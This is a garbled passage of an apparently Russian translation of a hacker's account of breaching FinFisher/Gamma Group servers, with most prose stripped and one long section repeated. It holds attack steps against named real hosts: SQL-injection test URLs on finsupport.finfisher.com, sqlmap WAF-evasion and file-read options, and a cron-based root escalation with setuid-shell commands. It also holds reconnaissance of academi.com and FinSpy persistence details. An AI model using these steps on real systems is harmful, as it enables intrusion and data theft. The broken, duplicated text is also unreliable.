. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
-
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois-www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois-academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-,fierce.pl
,fierce.pl -dns
- IP-. , , .
Google . ,academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- ,academiproshop.com
, .
FinFisherfinsupport.finfisher.com
whois-finfisher.com
, " FinFisher GmbH "."FinFisher GmbH" inurl:domaintools
gamma-international.de
,finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP .fierce
git-,git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-.fierce
, ,test.company.com
dev.company.com
, . nikto .webserver/.svn/
,webserver/backup/
,webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, (index.php
, , ).Scripts/scripts.js.php
Google:allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google:allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap--tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport ./BackOffice/
403 Forbidden , SQL- ( ).print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
,print.php
, . ! MySQL . ,magicquotes
, MySQL-INTO OUTFILE
. ,sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, ,unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . ,cron
.webalizer
, , . ,cron
, ,cron
.ls -l /etc/localtime
, 6- ,webalizer
, , , . , , , - , , . Root- , .
, . , , .nmap
. nse-nfs-*
smb-*
. finsupport - -,qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated